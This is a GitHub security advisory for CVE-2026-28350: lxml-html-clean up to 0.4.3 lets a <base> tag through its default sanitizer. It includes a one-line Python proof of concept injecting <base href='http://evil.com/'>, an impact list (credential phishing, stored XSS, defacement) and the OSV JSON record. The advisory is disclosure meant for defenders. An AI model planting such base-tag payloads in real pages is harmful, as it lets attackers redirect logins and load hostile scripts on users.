GHSA-XVP8-3MHV-424C

Vulnerability from github – Published: 2026-03-02 19:35 – Updated: 2026-03-05 22:49
VLAI?
Summary
lxml-html-clean has <base> tag injection through default Cleaner configuration
Details

Summary

The <base> tag passes through the default Cleaner configuration. While page_structure=True removes html, head, and title tags, there is no specific handling for <base>, allowing an attacker to inject it and hijack relative links on the page.

Details

The <base> tag is not currently in the page_structure kill set. Even though the specification says <base> must be inside <head>, browsers accept <base> tags outside of the head.

If an attacker injects a <base> tag, it changes the base URL for all relative URLs on the page (links, images, scripts) to a domain controlled by the attacker.

PoC

from lxml_html_clean import clean_html

# The base tag is preserved in the output
result = clean_html('<base href="http://evil.com/"><a href="/account">Account</a>')
print(result)
# Output: <div><base href="http://evil.com/">...<a href="/account">Account</a></div>

Impact

The injection of a <base> tag allows an attacker to hijack the resolution of all relative URLs on the page. This results in three critical attack vectors:

  1. Phishing & Redirection: Attackers can redirect user navigation (e.g., <a href="/login">) and form submissions (e.g., <form action="/auth">) to an attacker-controlled domain, effectively stealing credentials or sensitive data without the user realizing they have left the legitimate site.
  2. Cross-Site Scripting (XSS): If the victim application loads JavaScript files using relative paths (e.g., <script src="assets/app.js">), the browser will attempt to fetch the script from the attacker's domain. This upgrades the vulnerability from HTML injection to full Stored XSS.
  3. Defacement: Relative references to images (<img>) and stylesheets (<link>) will be loaded from the attacker's server, allowing for UI redressing or defacement.
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.4.3"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "lxml-html-clean"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.4.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-28350"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-02T19:35:52Z",
    "nvd_published_at": "2026-03-05T20:16:16Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nThe `\u003cbase\u003e` tag passes through the default `Cleaner` configuration. While `page_structure=True` removes `html`, `head`, and `title` tags, there is no specific handling for `\u003cbase\u003e`, allowing an attacker to inject it and hijack relative links on the page.\n\n### Details\nThe `\u003cbase\u003e` tag is not currently in the `page_structure` kill set. Even though the specification says `\u003cbase\u003e` must be inside `\u003chead\u003e`, browsers accept `\u003cbase\u003e` tags outside of the head.\n\nIf an attacker injects a `\u003cbase\u003e` tag, it changes the base URL for all relative URLs on the page (links, images, scripts) to a domain controlled by the attacker.\n\n### PoC\n```python\nfrom lxml_html_clean import clean_html\n\n# The base tag is preserved in the output\nresult = clean_html(\u0027\u003cbase href=\"http://evil.com/\"\u003e\u003ca href=\"/account\"\u003eAccount\u003c/a\u003e\u0027)\nprint(result)\n# Output: \u003cdiv\u003e\u003cbase href=\"http://evil.com/\"\u003e...\u003ca href=\"/account\"\u003eAccount\u003c/a\u003e\u003c/div\u003e\n```\n\n### Impact\nThe injection of a `\u003cbase\u003e` tag allows an attacker to hijack the resolution of **all** relative URLs on the page. This results in three critical attack vectors:\n\n1.  **Phishing \u0026 Redirection:** Attackers can redirect user navigation (e.g., `\u003ca href=\"/login\"\u003e`) and form submissions (e.g., `\u003cform action=\"/auth\"\u003e`) to an attacker-controlled domain, effectively stealing credentials or sensitive data without the user realizing they have left the legitimate site.\n2.  **Cross-Site Scripting (XSS):** If the victim application loads JavaScript files using relative paths (e.g., `\u003cscript src=\"assets/app.js\"\u003e`), the browser will attempt to fetch the script from the attacker\u0027s domain. This upgrades the vulnerability from HTML injection to full Stored XSS.\n3.  **Defacement:** Relative references to images (`\u003cimg\u003e`) and stylesheets (`\u003clink\u003e`) will be loaded from the attacker\u0027s server, allowing for UI redressing or defacement.",
  "id": "GHSA-xvp8-3mhv-424c",
  "modified": "2026-03-05T22:49:24Z",
  "published": "2026-03-02T19:35:52Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/fedora-python/lxml_html_clean/security/advisories/GHSA-xvp8-3mhv-424c"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28350"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fedora-python/lxml_html_clean/commit/9c5612ca33b941eec4178abf8a5294b103403f34"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fedora-python/lxml_html_clean"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "lxml-html-clean has \u003cbase\u003e tag injection through default Cleaner configuration"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…